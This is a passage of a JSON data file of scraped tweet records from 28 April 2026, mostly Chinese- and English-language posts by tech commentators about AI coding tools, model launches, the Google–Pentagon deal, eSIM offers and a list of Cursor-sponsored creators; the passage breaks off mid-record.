"@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: They were saying that AI was going to enable time travel, and quite frankly, it truly did! It transported us all straight to 1984.", + "url": "https://x.com/GaryMarcus/status/2049166017138692254", + "published_at": "2026-04-28T16:37:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: “Sam Altman comes from the Zuckerberg school of business: give dumb people access to your tools, study them and, like the Borg, steal every innovation they have.” - @Jason \n\nthey're not just studying the models. they're studying you.", + "url": "https://x.com/jason/status/2049164438989672648", + "published_at": "2026-04-28T16:30:48+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "honestly, one of the worst things this nation has ever done to itself.", + "url": "https://x.com/GaryMarcus/status/2049161039665848492", + "published_at": "2026-04-28T16:17:18+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "现在远程面试可以更干脆了。\n\n面试官当甲方出需求,\n应聘者打开 Codex / Claude Code,\n直接共享屏幕开始干。\n\n半小时什么都看清了。", + "url": "https://x.com/frxiaobei/status/2049158565487935850", + "published_at": "2026-04-28T16:07:28+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad.\n\nComet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet alongside the apps you already use.\n\nAvailable now on the App Store.", + "url": "https://x.com/AravSrinivas/status/2049157990604025896", + "published_at": "2026-04-28T16:05:11+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "当我听说AI博主赚钱,我去做了,发现也不是那样\n\n当我听说知识付费赚钱,我也去做了,发现也不是很赚钱\n\n当我听说线下开课挺赚钱的,中午吃饭被点醒了,我应该去做啥", + "url": "https://x.com/GoSailGlobal/status/2049157687766663643", + "published_at": "2026-04-28T16:03:58+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Talking AI with @MarioNawfal momentarily\n\n (9am PT; link info will be at his pinned tweet, or view on YouTube).", + "url": "https://x.com/GaryMarcus/status/2049156171463110746", + "published_at": "2026-04-28T15:57:57+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "雷老板是懂营销的,\n\n本着拿人 token,替人带货的原则,\n\n替 Xiaomi MiMo 喊个话。", + "url": "https://x.com/frxiaobei/status/2049155099071750164", + "published_at": "2026-04-28T15:53:41+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "最赚钱的莫过于,帮别人开Claude被封全额退款再抽个20%的水\n难怪A/那么多人用,原来是全民退款流", + "url": "https://x.com/realNyarime/status/2049154953483370544", + "published_at": "2026-04-28T15:53:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I spent the last 2 months trying to prevent this. If OpenAI offered a fig leaf, Google said \"imagine we offered a fig leaf.\"\n\nGoogle affirms it can't veto usage, commits to modify safety filters at government request, & aspirational language with no legal restrictions.\n\nShameful.", + "url": "https://x.com/GaryMarcus/status/2049153749743264231", + "published_at": "2026-04-28T15:48:20+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "那我也得查下拉\n\n英国公司 Mark", + "url": "https://x.com/GoSailGlobal/status/2049153253464490431", + "published_at": "2026-04-28T15:46:21+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Integrating Starlink with @TMobile’s 5G network will provide reliable, high-speed broadband for millions of businesses, including those in rural and remote locations across the country 🛰️❤️", + "url": "https://x.com/elonmusk/status/2049151577597112419", + "published_at": "2026-04-28T15:39:42+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "R to @AravSrinivas: reddit.com/r/GeminiAI/commen…", + "url": "https://x.com/AravSrinivas/status/2049151356985040934", + "published_at": "2026-04-28T15:38:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.", + "url": "https://x.com/AravSrinivas/status/2049151268606894310", + "published_at": "2026-04-28T15:38:28+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Actually Smart Summon now reacts a lot faster", + "url": "https://x.com/elonmusk/status/2049150833422647689", + "published_at": "2026-04-28T15:36:44+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why investors need to give CEOs better comp packages:\n\n\"We went public in 21. First year, the stock went up to about 40BN market cap. In 2022, we fell 92% to a little under $4 billion market cap.\n\nFor the life of the company, I had only taken equity. I had taken no compensation. At the bottom in 22, I made a decision and that was for the first time to ask for compensation.\n\nI felt like I'm public. Turning this company around is a big task, and I'd like to align myself with investors to say, I'm gonna get paid, but I'm only gonna get paid if the stock recovers.\n\nIn order for me to get paid anything, the stock had to clear a certain price.\n\nCEOs who are founders originally started a business taking really big risk. If the belief is that the CEO should then never get compensation ever again, it's completely flawed logic.\" Adam Foroughi, @AppLovin\n\nWhat are your single biggest lessons/advice on this @vkhosla @bhalligan @infoarbitrage @taavet @elonmusk?", + "url": "https://x.com/HarryStebbings/status/2049145110491967672", + "published_at": "2026-04-28T15:14:00+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣\n\n我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。", + "url": "https://x.com/dingyi/status/2049143565260042558", + "published_at": "2026-04-28T15:07:51+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。\n\n我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。\n\nClaude Code、Skills、OpenClaw,不都在向全自动化发展。\n如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。\n\n现在 AI Coding 的能力已经非常非常强了,你做出一个产品做出来后,完全可以让 AI 直接一键去复刻。\n\n用户想用什么产品,自己就一句话做出来了,那我们现在很多人去做的产品又有多少意义呢?\n\n甚至说现在很多产品其实不如一个 Skills,如果我能用一个 Skills 解决那为什么要用你的产品?", + "url": "https://x.com/gkxspace/status/2049136483106230523", + "published_at": "2026-04-28T14:39:43+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "升级了自己的 AI 视频管线把这个文字内容重做成 46 秒竖屏视频版。\n\n全自动化 pipeline 操作的。大家觉得怎么样👀\n\n之前开源的 claude-video-kit 详情见 https://x.com/runes_leo/status/2041395548234944600", + "url": "https://x.com/runes_leo/status/2049133521919484102", + "published_at": "2026-04-28T14:27:57+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "你们的ChatGPT都是什么样子?\n\n提示词如下:\n\nChatGPT,你陪我一段时间了,我想看看你的样子。请生成一张类似你自己用iPhone随手自拍的照片:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照片略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种\"过于真实的随手一拍感”,就像是从口袋里拿出手机不小心按到的自拍\n\nlinuxdo刷到的", + "url": "https://x.com/Pluvio9yte/status/2049128229760561602", + "published_at": "2026-04-28T14:06:55+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "50000🎉🎉", + "url": "https://x.com/CuiMao/status/2049128032661852434", + "published_at": "2026-04-28T14:06:08+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "CMLink英国卡老用户可在【无忧行英国版JegoTrip-CMLink】领20G本地流量包\n另外CMLink UK下架eSIM,要求补卡要激活一个月才能补,估计是防止国内用户下单抢名额", + "url": "https://x.com/realNyarime/status/2049127378815942981", + "published_at": "2026-04-28T14:03:32+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。", + "url": "https://x.com/CuiMao/status/2049127261409034535", + "published_at": "2026-04-28T14:03:04+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "图像类产品现在分两派:\n把单次生成做到极致,和把整个视觉工作流跑通。\n\nflowith 明显是后者,还顺手把视频给 seedance 出来了。\n\n关键是底层就是 image2,而且不止这一个模型。\n\n不管底层怎么换,上层工作流都很稳。\n单点极致 + 工作流闭环,两派合一。\n\n对我这种普通用户非常有价值。", + "url": "https://x.com/frxiaobei/status/2049121762009632774", + "published_at": "2026-04-28T13:41:13+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: 支持json格式的日志导出!很重要", + "url": "https://x.com/CuiMao/status/2049120290949702063", + "published_at": "2026-04-28T13:35:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Flowith出 GPT image 的生图Agent,真快呀\n\n我赶紧试试,看看如何!!", + "url": "https://x.com/lxfater/status/2049119209502670864", + "published_at": "2026-04-28T13:31:04+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "因为要做benchmark,所以用claude做了个win原生的显卡监控,市面上的都过度设计给游戏用的花里胡哨。这个版本算跑起来了,下个一版本支持本地多卡监控。", + "url": "https://x.com/CuiMao/status/2049118822070997394", + "published_at": "2026-04-28T13:29:32+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Test of Time LLM from some legends...pretty fun!", + "url": "https://x.com/soumithchintala/status/2049117783447785523", + "published_at": "2026-04-28T13:25:24+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "账号代运营这个事,我只在微信聊天里说过\n\n且没有外传\n\n为什么豆包能知道?微信南山必胜客,可以查查哈", + "url": "https://x.com/GoSailGlobal/status/2049112739696513306", + "published_at": "2026-04-28T13:05:22+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "When I was 22 I was offered £18M (all cash) for 20VC media company. \n\nWith any tough decision, I went for a walk with my mother, she asked me one question: \n\n“What would you do tomorrow if you did sell the company today?” \n\nWithout a seconds thought I responded: \n\n“I would start The Nineteen Minute VC and use that as leverage to win in investing. \n\nWhen the alternative to selling is doing what you would already do, never sell. \n\nBet on yourself. Go long. \n\nIt was the single best decision I ever made. \n\nThanks Mama!", + "url": "https://x.com/HarryStebbings/status/2049112007475855369", + "published_at": "2026-04-28T13:02:27+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: x.com/i/article/204910523511…", + "url": "https://x.com/GoSailGlobal/status/2049109953668149643", + "published_at": "2026-04-28T12:54:18+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ Google’s Pentagon deal seems to allow for autonomous weapons and mass surveillance. ⚠️", + "url": "https://x.com/GaryMarcus/status/2049104294415409347", + "published_at": "2026-04-28T12:31:48+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "恭喜你们有职业定位了:AI 包工头\n\nAgent Operator,未来 5 年每家公司都会需要的新岗位?说人话就是 AI 包工头——专门编排 AI agent 干活,核心 5 项技能:MCP / CLI / skills.md / AGENTS.md / 业务嗅觉。\n\n但这不是新职业,是没起名字而已😆\n\n翻了下自己这半年攒的工作流,他列的每一条都对得上号。中文圈靠 Claude Code 自己搭流程的人也很多的,只是没人专门起这么一个 title。\n\n想跟上不用等 5 年,今晚把最高频的工作流写成一个 skill 试试就开始了。👀", + "url": "https://x.com/runes_leo/status/2049102248719052964", + "published_at": "2026-04-28T12:23:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Media Math…\nMore Negative/Sensationalist = More Viewers = Higher Prices for Advertising = Larger Profits = Happier Shareholders\nNowhere in the formula will you find educating, informing and empowering people.", + "url": "https://x.com/charliebilello/status/2049101573477806428", + "published_at": "2026-04-28T12:21:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "麻烦下次这种表单不要at我,我就是个傻逼,我不配。谢谢。", + "url": "https://x.com/CuiMao/status/2049099295337709885", + "published_at": "2026-04-28T12:11:57+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 我跟前同事说了下我的业务,然后他去问了下豆包", + "url": "https://x.com/GoSailGlobal/status/2049098535459553712", + "published_at": "2026-04-28T12:08:55+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "兄弟们,我真没做豆包GEO\n\n你把我收入都曝光了\n\n还曝光了我名字,给我增加了一些没有的业务🤣", + "url": "https://x.com/GoSailGlobal/status/2049098393448812767", + "published_at": "2026-04-28T12:08:22+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧?\n\n目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S", + "url": "https://x.com/dingyi/status/2049096050158551248", + "published_at": "2026-04-28T11:59:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "A venture firm saying we should have a podcast is like when they say they think AI is going to be big.", + "url": "https://x.com/HarryStebbings/status/2049095586335343034", + "published_at": "2026-04-28T11:57:12+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "这个 Codex 教程很不错,新手值得一看。\n\n作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。\n\n5 个有用的技巧:\n\n①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。\n\n②插件是别人给你的能力,skills是你自己造的能力。遇到重复流程,用 /skill creator 让 AI 帮你封装成可复用技能。\n\n③自动化只需要一句话,如:\"把这个任务每周五下午4点跑一次\"。日历周报、YouTube 数据分析、Twitter 发帖,全部自动。\n\n④Codex 的设计能力是短板。解法是在 Codex 终端里直接跑 Claude Code,让它处理视觉密集型任务。Codex 调度,Claude 出活,各取所长。\n\n⑤Steer 功能让你在 AI 工作途中实时注入修正指令,不用等它跑完再改。Fork 功能让你从一个已有大量上下文的聊天分叉出新任务,不用重复描述背景。\n\n⑥从 Anthropic 的 http://claude.ai/design 里提取设计工具的工作逻辑,直接移植到 Codex 变成自己的技能。跨平台能力迁移。\n\nhttps://x.com/Saccc_c/status/2048629684792098966/video/1", + "url": "https://x.com/gkxspace/status/2049083226463797284", + "published_at": "2026-04-28T11:08:05+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: Hugging Face: https://huggingface.co/collections/sensenova/sensenova-u1\n\n在线体验与接入:\nSenseNova官网:https://sensenova.sensetime.com/", + "url": "https://x.com/berryxia/status/2049073897660953075", + "published_at": "2026-04-28T10:31:01+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🔥兄弟们,最近多模态图像模型真是神仙打架啊!\n看来又要来一波,实测对比了啊!\n前几天才发完测试,又有新的模型,真心吃不消啊!\n\n又发现一个全网开源、即刻可用的重磅神器 —— 商汤 OpenSenseNova 刚刚发布 SenseNova-U1!\n\n原生统一多模态大模型,NEO-Unify架构,视觉+语言从第一性原理彻底打通,无独立VE/VAE!\n\n核心技术亮点:\n• 文本与图像深度交错生成(教程、海报、漫画一气呵成)\n• 推理驱动的智能图像编辑(懂物理逻辑)\n• 高密度信息图表渲染超强\n\n模型大小高度本地化:\n• 8B 密集模型\n• A3B-MoT(活性参数仅约3B,个人显卡就能本地部署跑起来!)\n\n全网开源部署,Apache 2.0 可商用:\nGitHub: https://github.com/OpenSenseNova/SenseNova-U1\n\n立刻登录领取限时免费Token Plan额度,每天5小时 + 1500次无门槛调用,零成本解锁极速体验!\n\n即将上线「办公小浣熊」,这个结合办公看看能不能搞点东西出来!\n\n本地多模态时代,冲就对了!", + "url": "https://x.com/berryxia/status/2049073892829036759", + "published_at": "2026-04-28T10:31:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "😅😅玩游戏顶着 CuiMao 的 ID 被队友认出来了。", + "url": "https://x.com/CuiMao/status/2049073837543940468", + "published_at": "2026-04-28T10:30:47+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下:\n\n1. Obsidian:用来做内容存档、搭建个人知识库\n2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商\n3. Codex :最近更新很频繁,体验也越来越好,而且不封号\n4. Ghostty:一个非常丝滑的终端,推荐~\n5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽\n6. V2rayN:更加必不可少了,大家都懂", + "url": "https://x.com/gkxspace/status/2049072666385006919", + "published_at": "2026-04-28T10:26:08+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "央视报道了 “渔猎齐哥” Up主,真牛逼啊。\n监督环境保护,吾辈义不容辞!", + "url": "https://x.com/0xAA_Science/status/2049072268165497033", + "published_at": "2026-04-28T10:24:33+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "Xiaomi MiMo V2.5包含旗舰推理模型、多模态模型和语音合成模型,MiMo API 开放平台面向全球用户提供 API 推理服务,可直接对接Claude Code、Cursor、OpenClaw等主流编程工具\n还是有点期待的,如果有OpenClaw需求的同学们可以考虑提交自己的GitHub或项目官网+100字以上小作文申请\n\n北京时间2026年4月28日至5月28日,共 30 天,赠完即止。面向全球所有用户开放,个人开发者、团队、企业均可参与\nhttps://100t.xiaomimimo.com/", + "url": "https://x.com/realNyarime/status/2049070878961656082", + "published_at": "2026-04-28T10:19:02+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "从 Claude 转向 Codex 的越来越多了\n我也有同感\n没 100% 切到 Codex 是因为我还在双轨用:\nCC 写日常对话+内容/工具代码+工作流编排,Codex 做策略/数据代码+独立 review+verify。\n两边各有强项,先一起用着看看👀", + "url": "https://x.com/runes_leo/status/2049070650481066377", + "published_at": "2026-04-28T10:18:07+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "来盛大逛了逛 \n\n见了推友艾略特@elliotchen100 @evermind \n\n原来他们集团旗下,好多个AI Native团队\n\n拿了一波周边👀", + "url": "https://x.com/GoSailGlobal/status/2049061850621296924", + "published_at": "2026-04-28T09:43:09+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "是谁污染了icu后缀域名???", + "url": "https://x.com/realNyarime/status/2049059109258010927", + "published_at": "2026-04-28T09:32:15+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "本来要明天才能刷新的 codex 额度,突然又被提前重置了一轮\n\nCodex 这点真有意思呀\n\n周额度按理说 7 天一刷新,实际上隔几天就偷偷给你重置一次。\n\n这到底是营销策略还是什么骚操作", + "url": "https://x.com/runes_leo/status/2049055175906931184", + "published_at": "2026-04-28T09:16:38+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "中国移动CMLink UK(小移在英国)发布官方App【JegoTrip-CMLink】\n由JegoTrip无忧行团队负责开发,仅提供用量、话费查询,不过也可以领免费eSIM\n1)5月31日之前,下载并登录App可获得20GB英国本地流量,7个工作日内到账有效期28天\n2)新用户可领取eSIM一张,此卡可在中国香港、英国及欧盟进行激活,或使用英国IP代理下拉起WiFi通话(VoWiFi)激活号卡\n\n激活后可办理中英月套餐,每月16.8英镑(约人民币168元)享受150GB两地流量。虽然CMLink的120天公平使用原则永远不会生效,但仍需注意在套餐取消、过期后30天应办理有效套餐,最便宜的12英镑保号套餐可维持一年,否则号卡将在一个月后失效无法找回", + "url": "https://x.com/realNyarime/status/2049053713642471580", + "published_at": "2026-04-28T09:10:49+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "国内银行大概是永远也不会有这种工具了。\n\nhttps://rayfinance.app/", + "url": "https://x.com/dingyi/status/2049051261295878623", + "published_at": "2026-04-28T09:01:04+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。", + "url": "https://x.com/chuxiaeth/status/2049048148660965739", + "published_at": "2026-04-28T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "其实我最遗憾的是,帝国时代Online为什么下掉了,最怀念的是AOE2那会跟同学拿着U盘拷副本,然后在电脑课教室的局域网里面联机,回家后还用浩方周末组队\n记得我最喜欢的是拜占庭,我的发小会选哥特跟我联盟,至于其他小伙伴就是按照他们的习惯选择。不过后面就都各奔东西,唯独我的世界、幻兽帕鲁这类的联机游戏又齐聚一堂\n\n如果可以的话,还是希望这辈子能看到微软把帝国时代Online给重新上架,总感觉后来重制版、Steam联机这些都不是很好玩,反而觉得最老的DX9是最舒服的(可能就是活在那个年代的人", + "url": "https://x.com/realNyarime/status/2049047146146754812", + "published_at": "2026-04-28T08:44:43+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。\n#TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。", + "url": "https://x.com/chuxiaeth/status/2049045566857064461", + "published_at": "2026-04-28T08:38:27+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误", + "url": "https://x.com/chuxiaeth/status/2049043685094907944", + "published_at": "2026-04-28T08:30:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/bozhou_ai/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: 《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 